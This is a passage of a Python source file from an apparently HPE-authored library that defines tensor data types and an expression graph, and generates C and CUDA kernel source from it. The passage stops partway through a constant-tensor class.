from .sequence import *
|
# Copyright 2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
import ctypes
import string
import re
import six
import numpy as np
from . import language_pb2 as lang
class DType(object):
"""
Data type object which indicates a low level type.
"""
_np_lookup = {
np.float16: lang.FLOAT16,
np.float32: lang.FLOAT32,
np.float64: lang.FLOAT64,
np.int8: lang.INT8,
np.int16: lang.INT16,
np.int32: lang.INT32,
np.int64: lang.INT64,
np.uint8: lang.UINT8,
np.uint16: lang.UINT16,
np.uint32: lang.UINT32,
np.uint64: lang.UINT64}
_ctypes_lookup = {
lang.FLOAT32: ctypes.c_float,
lang.FLOAT64: ctypes.c_double,
lang.INT8: ctypes.c_int8,
lang.INT16: ctypes.c_int16,
lang.INT32: ctypes.c_int32,
lang.INT64: ctypes.c_int64,
lang.UINT8: ctypes.c_uint8,
lang.UINT16: ctypes.c_uint16,
lang.UINT32: ctypes.c_uint32,
lang.UINT64: ctypes.c_uint64
}
_cstr_lookup = {
lang.FLOAT32: 'float',
lang.FLOAT64: 'double',
lang.INT8: 'int8_t',
lang.INT16: 'int16_t',
lang.INT32: 'int32_t',
lang.INT64: 'int64_tf',
lang.UINT8: 'uint8_t',
lang.UINT16: 'uint16_t',
lang.UINT32: 'uint32_t',
lang.UINT64: 'uint64_t'
}
_tensorflow_lookup = {
lang.FLOAT32: 'float',
lang.FLOAT64: 'double',
lang.INT8: 'int8',
lang.INT16: 'int16',
lang.INT32: 'int32',
lang.INT64: 'int64',
lang.UINT8: 'uint8',
lang.UINT16: 'uint16'
}
def __init__(self, dtype):
if type(dtype) is DType:
self.proto_dtype = dtype.proto_dtype
elif dtype in list(DType._np_lookup.keys()):
# find index by equality, rather than equivalency
index = list(DType._np_lookup.keys()).index(dtype)
self.proto_dtype = list(DType._np_lookup.values())[index]
elif isinstance(dtype, six.integer_types):
if dtype not in list(lang.DType.values()):
raise ValueError('dtype ' + str(dtype) + ' is not valid.')
else:
self.proto_dtype = dtype
else:
raise TypeError('dtype ' + str(dtype) + ' is not valid.')
def __eq__(self, other):
if type(other) is not DType:
return False
else:
return self.proto_dtype == other.proto_dtype
def __hash__(self):
return id(self.proto_dtype)
def __ne__(self, other):
return not self == other
def __str__(self):
return lang.DType.Name(self.proto_dtype)
def as_numpy(self):
return list(DType._np_lookup.keys())[list(DType._np_lookup.values()).index(self.proto_dtype)]
def as_ctypes(self):
return DType._ctypes_lookup[self.proto_dtype]
def as_cstr(self):
return DType._cstr_lookup[self.proto_dtype]
def as_tensorflow(self):
return DType._tensorflow_lookup[self.proto_dtype]
def as_proto(self):
return self.proto_dtype
#: The half-precision floating point DType
float16 = DType(lang.FLOAT16)
#: The single precision floating point DType
float32 = DType(lang.FLOAT32)
#: The double precision floating point DType
float64 = DType(lang.FLOAT64)
#: The 8 bit signed integer DType
int8 = DType(lang.INT8)
#: The 16 bit signed integer DType
int16 = DType(lang.INT16)
#: The 32 bit signed integer DType
int32 = DType(lang.INT32)
#: The 64 bit signed integer DType
int64 = DType(lang.INT64)
#: The 8 bit unsigned integer DType
uint8 = DType(lang.UINT8)
#: The 16 bit unsigned integer DType
uint16 = DType(lang.UINT16)
#: The 32 bit unsigned integer DType
uint32 = DType(lang.UINT32)
#: The 64 bit unsigned integer DType
uint64 = DType(lang.UINT64)
supported_types = [float16, float32, float64, int8, int16, int32, int64, uint8, uint16, uint32, uint64]
class TensorType(object):
"""
A tensor is defined by its data type and its shape.
"""
def __init__(self, shape, dtype):
"""
:param shape: The tensor shape
:param dtype: The data type
:return: A tensor type object
"""
self.dtype = DType(dtype)
if isinstance(shape, six.integer_types):
self.shape = [shape]
else:
self.shape = []
for elem in shape:
if elem is None:
raise TypeError('All dimensions must be defined.')
elif not isinstance(elem, six.integer_types):
raise TypeError('Shape must be an iterable of ints.')
else:
self.shape.append(elem)
for elem in self.shape:
if elem <= 0:
raise ValueError('All tensor dimensions must be positive, but got: ' + str(self.shape))
self.size = 1
for elem in self.shape:
self.size *= elem
self.rank = len(self.shape)
self._proto_tensor_type = lang.TensorType()
self._proto_tensor_type.dtype = self.dtype.proto_dtype
self._proto_tensor_type.shape.extend(self.shape)
def __eq__(self, other):
if not isinstance(other, TensorType):
return False
else:
return self._proto_tensor_type == other.as_proto()
def __ne__(self, other):
if type(other) is not TensorType:
return True
else:
return self._proto_tensor_type != other.as_proto()
def __str__(self):
return str(self._proto_tensor_type)
@staticmethod
def like(other):
"""
Resolve the TensorType the argument
:param other: The input object
:return: A TensorType like the input object
"""
try:
other_shape = other.shape
except AttributeError:
other_shape = other.get_shape().as_list()
try:
other_dtype = other.dtype.as_numpy_dtype().dtype
except AttributeError:
other_dtype = other.dtype
return TensorType(other_shape, other_dtype)
@staticmethod
def from_proto(proto):
"""
Recover TensorType object from protocol buffer serialization
:param proto: the protobuf
:return: A TensorType object
"""
return TensorType(proto.shape, proto.dtype)
def as_proto(self):
"""
Serialize this object as a protocol buffer
:return: A protobuf
"""
tt = lang.TensorType()
tt.CopyFrom(self._proto_tensor_type)
return tt
def _list_to_str(x):
out = ''
for i, cur in enumerate(x):
out += str(cur)
if i < len(x) - 1:
out += ', '
return out
class ExpressionDAG(object):
"""
Singleton object for keeping track of expressions in the order in which they are defined. Expressions must register themselves
with the ExpressionDAG upon construction with the append() method.
"""
exprs = []
expr_ids = []
workgroup_shape = None
num_outputs = 0
num_inputs = 0
@staticmethod
def io_types():
input_types = ExpressionDAG.num_inputs*[None]
output_types = ExpressionDAG.num_outputs*[None]
found_count = 0
for expr in ExpressionDAG.exprs:
if expr.proto_expr.code == lang.INPUT:
input_types[expr.proto_expr.io_index] = TensorType.from_proto(expr.proto_expr.tensor_type)
found_count += 1
elif expr.proto_expr.code == lang.OUTPUT:
output_types[expr.proto_expr.io_index] = TensorType.from_proto(expr.proto_expr.tensor_type)
found_count += 1
if found_count == ExpressionDAG.num_inputs + ExpressionDAG.num_outputs:
break
return input_types, output_types
@staticmethod
def clear():
"""
Clear all currently tracked expressions.
:return:
"""
ExpressionDAG.exprs = []
ExpressionDAG.expr_ids = []
ExpressionDAG.workgroup_shape = None
ExpressionDAG.num_outputs = 0
ExpressionDAG.num_inputs = 0
@staticmethod
def append(item):
"""
Append an item to the expression list.
:param item: The expression to append.
:return: None
"""
if not issubclass(item.__class__, _Expression):
raise TypeError('Can only append expressions.')
if type(item) is PositionTensor:
if ExpressionDAG.workgroup_shape is None:
ExpressionDAG.workgroup_shape = item.proto_expr.uint32_data
else:
raise ValueError('Already defined the position tensor.')
if type(item) is OutputTensor:
if item.proto_expr.io_index != ExpressionDAG.num_outputs:
raise ValueError('Trying to add outputs to expression dag out of order')
ExpressionDAG.num_outputs += 1
if type(item) is InputTensor:
if item.proto_expr.io_index != ExpressionDAG.num_inputs:
raise ValueError('Trying to add inputs to expression dag out of order')
ExpressionDAG.num_inputs += 1
# Assign names to each expression as they get appended
if item.name is None:
if type(item) is InputTensor:
item.name = '(*in'+str(item.proto_expr.io_index)+')'
elif type(item) is OutputTensor:
item.name = '(*out'+str(item.proto_expr.io_index)+')'
elif type(item) is PositionTensor:
item.name = 'position'
elif type(item) is _ConstScalar:
item.name = str(item.value())
elif type(item) is _ConstTensor:
item.name = '{'+_list_to_str(item.to_array().tolist())+'}'
else:
item.name = 'e'+str(len(ExpressionDAG.exprs))
ExpressionDAG.exprs.append(item)
ExpressionDAG.expr_ids.append(id(item))
@staticmethod
def remove_endif():
"""
find and remove the most recent _EndIf expression, used for continuing if blocks
:return: None
"""
found_endif = False
for i in range(len(ExpressionDAG.exprs)):
if type(ExpressionDAG.exprs[-i-1]) is _EndIf:
found_endif = True
del(ExpressionDAG.exprs[-i-1])
del(ExpressionDAG.expr_ids[-i-1])
break
if found_endif is False:
raise SyntaxError('Could not find prior if block')
@staticmethod
def as_proto():
"""
Serialize the current ExpressionDAG as a protocol buffer
:return: the protobuf
"""
if ExpressionDAG.workgroup_shape is None:
raise ValueError('Workgroup shape must be defined with "position_in" function.')
proto = lang.ExpressionDAG()
proto.workgroup_shape.extend(ExpressionDAG.workgroup_shape)
for i, expr in enumerate(ExpressionDAG.exprs):
proto.expressions.add().CopyFrom(expr.proto_expr)
operand_indices = []
for input_expr in expr.input_exprs:
operand_indices.append(ExpressionDAG.expr_index(input_expr))
proto.references.add().operand_indices.extend(operand_indices)
# Reorder op dag to make sure that all elseif conditionals are positioned
# before entering the if block
if_block_start = []
needs_reordering = []
for i, expr in enumerate(proto.expressions):
if expr.code is lang.IF:
if_block_start.append(i)
needs_reordering.append([])
elif expr.code is lang.ELSEIF:
# recursively find all conditional dependencies that need to be reordered
def find_reorders(x):
for ref in proto.references[x].operand_indices:
if ref > if_block_start[-1]:
find_reorders(ref)
needs_reordering[-1].append(x)
conditional_index = proto.references[i].operand_indices[0]
find_reorders(conditional_index)
elif expr.code is lang.ENDIF:
new_to_old_index = {}
num_reorders = len(needs_reordering[-1])
if num_reorders > 0:
reorder_count = 0
for cur_index in range(if_block_start[-1], needs_reordering[-1][-1] + 1):
if cur_index in needs_reordering[-1]:
new_to_old_index[if_block_start[-1] + reorder_count] = cur_index
reorder_count += 1
else:
new_to_old_index[cur_index + num_reorders - reorder_count] = cur_index
def new_to_old(x):
if x in list(new_to_old_index.keys()):
return new_to_old_index[x]
else:
return x
old_to_new_index = dict((v, k) for k, v in new_to_old_index.items())
def old_to_new(x):
if x in list(old_to_new_index.keys()):
return old_to_new_index[x]
else:
return x
# perform the reordering
new_dag = lang.ExpressionDAG()
num_expressions = len(proto.expressions)
for cur_index in range(num_expressions):
# copy expressions from old spot to new spot
cur_expr = proto.expressions[new_to_old(cur_index)]
head_expr = new_dag.expressions.add()
head_expr.CopyFrom(cur_expr)
# copy and update references from old spot to new spot
cur_refs = []
for ref in proto.references[new_to_old(cur_index)].operand_indices:
cur_refs.append(old_to_new(ref))
head_reference = new_dag.references.add()
head_reference.operand_indices.extend(cur_refs)
proto = new_dag
# finished reordering conditionals, get rid of reordering info
if_block_start = if_block_start[:-1]
needs_reordering = needs_reordering[:-1]
return proto
@staticmethod
def from_proto(expression_dag):
"""
Clear the current ExpressionDAG and build up a fresh one from a serialized protocol buffer.
:param expression_dag: the serialized protobuf
:return: None
"""
code_to_class = {
lang.INPUT: InputTensor,
lang.OUTPUT: OutputTensor,
lang.CONST_SCALAR: _ConstScalar,
lang.CONST_TENSOR: _ConstTensor,
lang.POSITION: PositionTensor,
lang.VARIABLE: Variable,
lang.CAST: _Cast,
lang.TENSOR: LocalTensor,
lang.ASSIGN_VARIABLE: _AssignVariable,
lang.ASSIGN_TENSOR: _AssignTensor,
lang.READ_TENSOR: _ReadTensor,
lang.RANGE: _Range,
lang.ENDRANGE: _EndRange,
lang.IF: _If,
lang.ELSEIF: _ElseIf,
lang.ELSE: _Else,
lang.ENDIF: _EndIf,
lang.ACOS: _UnaryMath,
lang.ASIN: _UnaryMath,
lang.ATAN: _UnaryMath,
lang.COS: _UnaryMath,
lang.COSH: _UnaryMath,
lang.SIN: _UnaryMath,
lang.SINH: _UnaryMath,
lang.TAN: _UnaryMath,
lang.TANH: _UnaryMath,
lang.EXP: _UnaryMath,
lang.LOG: _UnaryMath,
lang.LOG10: _UnaryMath,
lang.SQRT: _UnaryMath,
lang.CEIL: _UnaryMath,
lang.FLOOR: _UnaryMath,
lang.ABS: _UnaryMath,
lang.NEGATE: _UnaryMath,
lang.NOT: _UnaryMath,
lang.ADD: _BinaryMath,
lang.SUBTRACT: _BinaryMath,
lang.MULTIPLY: _BinaryMath,
lang.DIVIDE: _BinaryMath,
lang.MODULO: _BinaryMath,
lang.AND: _BinaryMath,
lang.OR: _BinaryMath,
lang.EQUAL: _BinaryMath,
lang.NOTEQUAL: _BinaryMath,
lang.LESS: _BinaryMath,
lang.LESS_EQ: _BinaryMath,
lang.GREATER: _BinaryMath,
lang.GREATER_EQ: _BinaryMath,
lang.MIN: _BinaryMath,
lang.MAX: _BinaryMath,
lang.POW: _BinaryMath,
lang.ATAN2: _BinaryMath,
lang.ISINF: _UnaryMath,
lang.ISFINITE: _UnaryMath,
lang.ISNAN: _UnaryMath,
lang.MIN_VALUE: _Limits,
lang.MAX_VALUE: _Limits,
lang.EPSILON: _Limits
}
ExpressionDAG.clear()
# iterate through each proto expression and build up the graph
for i, expr in enumerate(expression_dag.expressions):
cur_refs = expression_dag.references[i].operand_indices
input_exprs = []
for cur_ref in cur_refs:
input_exprs.append(ExpressionDAG.exprs[cur_ref])
code_to_class[expr.code].from_proto(expr, input_exprs)
@staticmethod
def generate(expression_dag, function_name):
"""
Generate C and CUDA code for evaluating the operation defined in the supplied serialized expression dag
protocol buffer.
:param expression_dag: The protobuf
:param function_name: The name of the function to use
:return: a tuple containing the source for: the generic c++ interface, and the generic cuda interface
"""
def _strip_margin(s):
return re.sub('\n[ \t]*\|', '\n', s)
ExpressionDAG.from_proto(expression_dag)
inputs = list()
outputs = list()
position = None
for expr in ExpressionDAG.exprs:
if type(expr) is InputTensor:
inputs.append(expr)
elif type(expr) is OutputTensor:
outputs.append(expr)
elif type(expr) is PositionTensor:
position = expr
num_inputs = len(inputs)
num_outputs = len(outputs)
args = list()
for arg in inputs + outputs:
args.append(arg.gen_ptr())
args_str = _list_to_str(args)
workgroup_shape = position.proto_expr.uint32_data
workgroup_block_size = [1]
num_workers = 1
for cur_dim in workgroup_shape:
num_workers *= cur_dim
expression_src = ''
for expr in ExpressionDAG.exprs:
try:
cur_c = expr.gen_c()
except NotImplementedError as e:
raise NotImplementedError(str(expr))
if cur_c != '':
expression_src += ' ' + cur_c
# generate c function
c_src = """
|//Generated Code
|#include <stdint.h>
|#include <stdlib.h>
|#include <math.h>
|
|//aliases for integer absolute values for ints < 32 bits in size
|//aliases are used because abs() does not work with for
|// 8 and 16 bit ints in CUDA. We use an alias here so that we can share
|// code generation infrastructure.
|#define abs_8(x) abs(x);
|#define abs_16(x) abs(x);
|
|void ${function_name}(${args_str},
| uint32_t block_size, uint32_t thread_index){
| uint32_t start = thread_index * block_size;
| uint32_t end = start + block_size;
| if (end > ${num_workers}) end = ${num_workers};
| for(uint32_t worker_index=start; worker_index < end; worker_index++){
|${expression_src}
| }
|}
|"""
c_src = string.Template(c_src).substitute(locals())
c_src = _strip_margin(c_src)
cuda_function = _strip_margin(string.Template("""
|//Generated Code
|
|//define integer absolute value function
|inline __device__ int8_t abs_8(const int8_t & x){ return ( x<0 ) ? -x : x;}
|inline __device__ int16_t abs_16(const int16_t & x){ return ( x<0 ) ? -x : x;}
|
|extern \"C\" __global__
|void ${function_name}(${args_str}){
| uint32_t worker_index = blockIdx.x * blockDim.x + threadIdx.x;
| if (worker_index < ${num_workers}) {
|${expression_src}
| }
|}
""").substitute(locals()))
# Generate the c generic parameter interface for unpacking polymorphic io parameters
generic_args = []
io_ptrs = ''
for inp in inputs:
cur_index = inp.proto_expr.io_index
cur_name = 'in'+str(cur_index)
generic_args.append(cur_name + '.p_fixed_len')
elements = inp.size
tipe = inp.dtype.as_cstr()
io_ptrs += string.Template("""
| if(inputs[${cur_index}]->length() != ${elements}) { *err = 1; return; }
| union u_in${cur_index}{
| const ${tipe} *p_arb_len;
| const ${tipe} (*p_fixed_len)[${elements}];
| };
| union u_in${cur_index} in${cur_index};
| in${cur_index}.p_arb_len = inputs[${cur_index}]->get<${tipe}>();
|""").substitute(locals())
for outp in outputs:
cur_index = outp.proto_expr.io_index
cur_name = 'out'+str(cur_index)
generic_args.append(cur_name + '.p_fixed_len')
elements = outp.size
tipe = outp.dtype.as_cstr()
io_ptrs += string.Template("""
| if(outputs[${cur_index}]->length() != ${elements}) { *err = 1; return; }
| union u_out${cur_index}{
| ${tipe} *p_arb_len;
| ${tipe} (*p_fixed_len)[${elements}];
| };
| union u_out${cur_index} out${cur_index};
| out${cur_index}.p_arb_len = outputs[${cur_index}]->get<${tipe}>();
|""").substitute(locals())
args = _list_to_str(generic_args)
c_generic = """
|#include "dynamiclibop.h"
|#include <vector>
|#include <memory>
|#include <cfloat>
|
|${c_src}
|
|extern "C"
|void ${function_name}_generic_cpp(std::vector<std::shared_ptr<const InputParameter>> inputs,
| std::vector<std::shared_ptr<OutputParameter>> outputs,
| uint32_t num_threads, uint32_t thread_index, uint16_t* err){
| //check that the number of inputs and outputs is correct
| if(inputs.size() != ${num_inputs}){ *err = 1; return; }
| if(outputs.size() != ${num_outputs}){ *err = 1; return; }
|
| //check that the size of inputs and outputs is correct, and cast them as pointers to arrays
${io_ptrs}
| uint32_t block_size = ${num_workers} / num_threads;
| if(${num_workers} % num_threads > 0) block_size += 1;
| return ${function_name}(${args}, block_size, thread_index);
|}
|"""
c_generic = string.Template(c_generic).substitute(locals())
c_generic = _strip_margin(c_generic)
cuda_generic = """
|#include "dynamiclibop.h"
|#include <vector>
|#include <string>
|#include <memory>
|#include <cfloat>
|#include <cuda.h>
|
|${cuda_function}
|
|extern "C"
|void ${function_name}_generic_cuda(std::vector<std::shared_ptr<const InputParameter>> inputs,
| std::vector<std::shared_ptr<OutputParameter>> outputs,
| CUstream stream, uint16_t threads_per_block, uint16_t* err){
| //check that the number of inputs and outputs is correct
| if(inputs.size() != ${num_inputs}){ *err = 1; return; }
| if(outputs.size() != ${num_outputs}){ *err = 1; return; }
|
| //check that the size of inputs and outputs is correct, and cast them as pointers to arrays
${io_ptrs}
| //enqueue function on stream
| uint32_t num_blocks = ${num_workers} / threads_per_block;
| if(${num_workers} % threads_per_block > 0) num_blocks += 1;
| ${function_name}<<<num_blocks, threads_per_block, 0, stream>>>(${args});
|}
"""
cuda_generic = string.Template(cuda_generic).substitute(locals())
cuda_generic = _strip_margin(cuda_generic)
# Generate the cuda generic parameter interface for unpacking polymorphic io parameters
return c_generic, cuda_generic
@staticmethod
def expr_index(expr):
"""
Resolve the index of a particular expression in the current DAG
:param expr: the expression
:return: its index
"""
return ExpressionDAG.expr_ids.index(id(expr))
class _Expression(object):
"""
The abstract class that defines the behavior of expressions.
"""
def __init__(self, expression_code):
# assign a protocol buffers member corresponding to this python object
if expression_code not in list(lang.ExpressionCode.values()):
raise ValueError('Expression code ' + str(expression_code) + ' is not valid.')
self.proto_expr = lang.Expression()
self.proto_expr.code = expression_code
self.input_exprs = []
self.name = None
def _register(self):
ExpressionDAG.append(self)
def __str__(self):
return str(self.proto_expr)
def gen_c(self):
raise NotImplementedError('Abstract Class')
def __ilshift__(self, other):
raise SyntaxError('Can only use assignment operator <<= on a variable.')
@staticmethod
def from_proto(proto, input_exprs):
raise NotImplementedError('Abstract Class')
def __bool__(self):
self.__nonzero__()
def __nonzero__(self):
raise SyntaxError('Attempting to interpret the truth of an expression. This typically happens when trying to '
'use a python native "if", "min", or "max" statement to create a data-dependent conditional '
'inside of an operator, which is not supported. To do so you must use the corresponding '
'"with if_(...)", "minimum", and "maximum" functions.')
class Scalar(_Expression):
"""
An expression that refers to a single data value which has a data type
"""
def __init__(self, expr_code, dtype):
if not isinstance(dtype, DType):
raise TypeError('Scalar expressions must be initialized with a DType')
super(Scalar, self).__init__(expr_code)
self.dtype = dtype
self.proto_expr.dtype = dtype.as_proto()
def __add__(self, other):
return _BinaryMath(self, other, lang.ADD)
def __radd__(self, other):
return _BinaryMath(other, self, lang.ADD)
def __sub__(self, other):
return _BinaryMath(self, other, lang.SUBTRACT)
def __rsub__(self, other):
return _BinaryMath(other, self, lang.SUBTRACT)
def __mul__(self, other):
return _BinaryMath(self, other, lang.MULTIPLY)
def __rmul__(self, other):
return _BinaryMath(other, self, lang.MULTIPLY)
# python 2
def __div__(self, other):
return _BinaryMath(self, other, lang.DIVIDE)
def __rdiv__(self, other):
return _BinaryMath(other, self, lang.DIVIDE)
# python 3
def __truediv__(self, other):
return _BinaryMath(self, other, lang.DIVIDE)
def __rtruediv__(self, other):
return _BinaryMath(other, self, lang.DIVIDE)
def __mod__(self, other):
return _BinaryMath(self, other, lang.MODULO)
def __rmod__(self, other):
return _BinaryMath(other, self, lang.MODULO)
def __eq__(self, other):
return _BinaryMath(self, other, lang.EQUAL)
def __ne__(self, other):
return _BinaryMath(self, other, lang.NOTEQUAL)
def __lt__(self, other):
return _BinaryMath(self, other, lang.LESS)
def __le__(self, other):
return _BinaryMath(self, other, lang.LESS_EQ)
def __gt__(self, other):
return _BinaryMath(self, other, lang.GREATER)
def __ge__(self, other):
return _BinaryMath(self, other, lang.GREATER_EQ)
def __neg__(self):
return _UnaryMath(self, lang.NEGATE)
@staticmethod
def from_proto(proto, input_exprs):
raise NotImplementedError('Abstract Class')
def gen_c(self):
raise NotImplementedError('Abstract Class')
class _TensorExpression(_Expression):
"""
An expression that refers to a tensor of data which has a TensorType
"""
def __init__(self, expr_code, tensor_type):
super(_TensorExpression, self).__init__(expr_code)
self.dtype = tensor_type.dtype
self.shape = tensor_type.shape
self.size = tensor_type.size
self.rank = tensor_type.rank
self.tensor_type = tensor_type
self.proto_expr.tensor_type.CopyFrom(tensor_type.as_proto())
def gen_ptr(self):
raise NotImplementedError('Abstract Class')
@staticmethod
def from_proto(proto, input_exprs):
raise NotImplementedError('Abstract Class')
def gen_c(self):
raise NotImplementedError('Abstract Class')
def _to_scalar_index(target_shape, index):
"""
Helper function for indexing tensors. All tensors are stored as C-style flattened arrays in memory, but are indexed
from the API with an index for each dimension. This function resolves the scalar index of the tensor memory from
the input index. The length of the input index must always be the same as the rank of the target tensor. Indices
can be a tensor, or a mixed iterable of constants, scalar expressions, and 0-D tensor expressions.
:param target: The tensor to be indexed
:param index: The index tensor or iterable
:return: a scalar expression containing the index of the flattened target tensor memory
"""
target_rank = len(target_shape)
block_size = [1]
for cur_dim in range(len(target_shape)-1, 0, -1):
block_size.append(block_size[-1]*target_shape[cur_dim])
block_size.reverse()
# try to wrap index as a const tensor
try:
index_expr = _ConstTensor(index)
except TypeError:
index_expr = index
# wrap scalar expressions as lists
if issubclass(index_expr.__class__, Scalar):
index_expr = [index_expr]
# try to wrap index as an explicit array tensor
# (e.g. img[row, column] where both row and column are scalar variables of the same type)
# allow for constants to be mixed with expressions (e.g. img[row, 5])
if type(index_expr) is list or type(index_expr) is tuple:
explicit_len = len(index_expr)
if target_rank != explicit_len:
raise IndexError('length of index list (' + str(explicit_len) +
') must match indexed tensor rank (' + str(target_rank) + ')')
exprs = []
for value in index_expr:
if issubclass(value.__class__, _Expression):
if not issubclass(value.__class__, Scalar):
if issubclass(value.__class__, _TensorExpression) and value.size == 1:
# enable indexing with size == 1 tensor
# This typically arises when the workground shape is 1D and the position
# tensor is a single value.
value = value[0]
else:
raise TypeError('Must index tensors with an int or a scalar expression. Instead got:\n' +
str(value))
exprs.append(value)
else:
# this dimension is constant, perform static bounds checking
cur_dim = len(exprs)
cur_shape = target_shape[cur_dim]
cur_value = int(np.floor(value))
if cur_value >= cur_shape or cur_value < 0:
raise IndexError('Expected index to be in range [0, ' + str(cur_shape) +
'), but received index value ' + str(cur_value))
exprs.append(cur_value)
index = None
for i, expr in enumerate(exprs):
if not isinstance(expr, six.integer_types):
# todo: optionally dynamically constrain each non-constant dimensional index to within shape bounds
# bound_expr = cast(minimum(maximum(expr, 0), target_shape[i]-1), uint64)
bound_expr = cast(expr, uint64)
else:
bound_expr = expr
if index is None:
index = bound_expr*block_size[i]
else:
index = index + bound_expr*block_size[i]
return index
elif type(index_expr) is _ConstTensor:
# indexing with a constant, perform static bounds checking
if len(index_expr.shape) != 1:
raise IndexError('Index must be one dimensional')
if index_expr.shape[0] != target_rank:
raise IndexError('length of index tensor (' + str(index_expr.shape[0]) +
') must match indexed tensor rank (' + str(target_rank) + ')')
data = np.floor(index_expr.to_array())
index = 0
for i, elem in enumerate(data):
cur_shape = target_shape[i]
cur_value = int(elem)
if cur_value >= cur_shape or cur_value < 0:
raise IndexError('Expected index to be in range [0, ' + str(cur_shape) +
'), but received index value ' + str(cur_value))
index += int(elem)*block_size[i]
return index
elif type(index_expr) in [LocalTensor, PositionTensor, InputTensor]:
if len(index_expr.shape) != 1:
raise IndexError('Index must be one dimensional')
if index_expr.shape[0] != target_rank:
raise IndexError('length of index tensor (' + str(index_expr.shape[0]) +
') must match indexed tensor rank (' + str(target_rank) + ')')
index = None
for i in range(target_rank):
cur_shape = target_shape[i]
cur_index = _ReadTensor(index_expr, i)
# todo: optionally dynamically constrain each dimensional index to within shape bounds
# bound_index = minimum(maximum(cast(cur_index, uint64), 0), cur_shape-1)
bound_index = cast(cur_index, uint64)
if index is None:
index = bound_index*block_size[i]
else:
index = index + bound_index*block_size[i]
return index
else:
raise TypeError('Cannot index a tensor with a ' + str(type(index_expr)))
class _Readable(object):
"""
A trait for tensors which enables them to be read
"""
def __getitem__(self, item):
return _ReadTensor(self, _to_scalar_index(self.shape, item))
class _Writable(object):
"""
A trait for tensors which enables them to be written
"""
def __setitem__(self, key, value):
_AssignTensor(self, _to_scalar_index(self.shape, key), value)
def _tensor_type_polymorhpic(*args):
"""
A helper function for resolving polymorphic inputs into a TensorType
:param args: args the define a TensorType, can be either a TensorType or a shape and a DType
:return: the resolved TensorType
"""
err_msg = 'Expected a TensorType or a shape and a dtype as arguments'
if len(args) == 1:
if type(args[0]) is not TensorType:
raise TypeError(err_msg)
tensor_type = args[0]
elif len(args) == 2:
tensor_type = TensorType(args[0], args[1])
else:
raise TypeError(err_msg)
return tensor_type
def input(*args):
"""
Create a new input
:param args: args the define a TensorType, can be either a TensorType or a shape and a DType
:return: the input expression
"""
tensor_type = _tensor_type_polymorhpic(*args)
return InputTensor(tensor_type, ExpressionDAG.num_inputs)
class InputTensor(_TensorExpression, _Readable):
"""
A read-only input tensor expression
"""
def __init__(self, tensor_type, io_index):
if not isinstance(tensor_type, TensorType):
raise TypeError
if not isinstance(io_index, six.integer_types):
raise TypeError
super(self.__class__, self).__init__(lang.INPUT, tensor_type)
if io_index < 0 or io_index > 2**32-1:
raise ValueError
self.proto_expr.io_index = io_index
super(self.__class__, self)._register()
def gen_ptr(self):
tipe = self.dtype.as_cstr()
name = self.name
elems = self.size
p = string.Template('const ${tipe} ${name}[${elems}]').substitute(locals())
return p
@staticmethod
def from_proto(proto, input_exprs):
tt = TensorType.from_proto(proto.tensor_type)
return InputTensor(tt, proto.io_index)
def gen_c(self):
return ''
def output(*args):
"""
Define a new output
:param args: args the define a TensorType, can be either a TensorType or a shape and a DType
:return: a tensor expression which refers to the newly defined output tensor
:Example:
Create a new output tensor ``out`` based on the ``TensorType`` of input tensor ``in0`` ::
out = output(in0.tensor_type)
:Example:
Create a new output tensor ``out`` based on the ``shape`` of input tensor ``in0`` and the ``DType`` of input tensor
``in1``::
out = output(in0.shape, in1.dtype)
"""
tensor_type = _tensor_type_polymorhpic(*args)
return OutputTensor(tensor_type, ExpressionDAG.num_outputs)
def output_like(other):
"""
Define a new output with the same TensorType as another tensor
:param other: another tensor
:return: a tensor expression which refers to the newly defined output tensor
"""
return output(TensorType.like(other))
class OutputTensor(_TensorExpression, _Writable):
"""
A write-only output expression
"""
def __init__(self, tensor_type, io_index):
if not isinstance(tensor_type, TensorType):
raise TypeError
if not isinstance(io_index, six.integer_types):
raise TypeError
super(self.__class__, self).__init__(lang.OUTPUT, tensor_type)
if io_index < 0 or io_index > 2**32-1:
raise ValueError
self.proto_expr.io_index = io_index
super(self.__class__, self)._register()
def gen_ptr(self):
tipe = self.dtype.as_cstr()
name = self.name
elems = self.size
p = string.Template('${tipe} ${name}[${elems}]').substitute(locals())
return p
@staticmethod
def from_proto(proto, input_exprs):
tt = TensorType.from_proto(proto.tensor_type)
return OutputTensor(tt, proto.io_index)
def gen_c(self):
return ''
class _ConstScalar(Scalar):
"""
A constant expression
"""
def __init__(self, value):
if type(value) is float:
super(self.__class__, self).__init__(lang.CONST_SCALAR, float64)
self.proto_expr.double_data.append(value)
elif isinstance(value, six.integer_types):
super(self.__class__, self).__init__(lang.CONST_SCALAR, int64)
self.proto_expr.sint64_data.append(value)
else:
tipe = str(type(value))
raise TypeError('Tried to wrap a '+tipe+' as a ConstScalar. Can only wrap an int or float')
super(self.__class__, self)._register()
def value(self):
if self.proto_expr.dtype == lang.FLOAT64:
return float(self.proto_expr.double_data[0])
elif self.proto_expr.dtype == lang.INT64:
return int(self.proto_expr.sint64_data[0])
else:
raise ValueError('Can only get a value from float64 or int64 constants.')
@staticmethod
def from_proto(proto, input_exprs):
if proto.dtype == lang.FLOAT64:
return _ConstScalar(float(proto.double_data[0]))
elif proto.dtype == lang.FLOAT32:
return _ConstScalar(float(proto.float_data[0]))
elif proto.dtype == lang.INT64:
return _ConstScalar(int(proto.sint64_data[0]))
else:
raise ValueError('Cannot recover constant scalar protobuf.')
def gen_c(self):
# return 'const ' + self.dtype.as_cstr() + ' ' + self.name + ' = ' + str(self.value()) + ';\n'
return ''
class _ConstTensor(_TensorExpression, _Readable):
"""
A constant tensor expression
"""
# translation table between dtypes and retrieval function for the data container to use
proto_data_lut = {
float16: lambda x: x.float_data,
float32: lambda x: x.float_data,
float64: lambda x: x.double_data,
int8: lambda x: x.sint32_data,
int16: lambda x: x.sint32_data,
int32: lambda x: x.sint32_data,
int64: lambda x: x.sint64_data,
uint8: lambda x: x.uint32_data,
uint16: lambda x: x.uint32_data,
uint32: lambda x: x.uint32_data,
uint64: lambda x: x.uint64_data
}
def __init__(self, value):
# use numpy functionality to convert lists and tuples to arrays
if type(value) is list:
array = np.array(value)
elif type(value) is tuple:
array = np.array(value)
elif type(value) is np.ndarray:
array = value
